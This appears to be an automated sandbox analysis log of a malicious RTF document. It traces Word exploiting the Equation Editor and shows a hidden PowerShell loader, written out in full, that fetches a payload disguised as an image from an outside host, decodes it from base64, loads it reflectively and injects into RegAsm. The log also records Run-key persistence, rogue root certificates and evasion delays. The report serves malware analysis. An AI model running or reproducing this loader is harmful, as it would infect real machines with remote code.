                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                      Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
                      Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\antre.vbs"
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: activeds.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: adsldpc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: browcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: davhlpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: credssp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: shcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: bcrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: nlaapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
Source: nU7Z8sPyvf.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\nU7Z8sPyvf.rtf
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb | source: powershell.exe, 0000000A.00000002.492134092.00000000091E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.446552841.00000000040C9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256n | source: powershell.exe, 0000000A.00000002.492134092.00000000091E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.446552841.00000000040C9000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00457106 push ecx; ret 15_2_00457119
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0045B11A push esp; ret 15_2_0045B141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0045E54D push esi; ret 15_2_0045E556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00457A28 push eax; ret 15_2_00457A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00434E56 push ecx; ret 15_2_00434E69

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\ProgramData\antre.vbs
Source: C:\Windows\SysWOW64\wscript.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\SysWOW64\wscript.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C054A URLDownloadToFileW,ShellExecuteW,ExitProcess

Boot Survival

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\antre.vbs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path
Source: C:\Windows\SysWOW64\wscript.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040F7A7 Sleep,ExitProcess
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Evasive API call chain: GetPEB, DecisionNodes, ExitProcess (graph_2-304)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041A748 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                      Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 360
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1537
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2034
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7752
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 499
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 9250
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1292 Thread sleep time: -240000s >= -30000s
                      Source: C:\Windows\SysWOW64\wscript.exe TID: 3340 Thread sleep time: -60000s >= -30000s
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3456 Thread sleep time: -120000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3540 Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3472 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3572 Thread sleep count: 2034 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3588 Thread sleep count: 7752 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620 Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632 Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632 Thread sleep time: -1800000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3820 Thread sleep count: 74 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3820 Thread sleep time: -37000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3824 Thread sleep count: 499 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3824 Thread sleep time: -1497000s >= -30000s
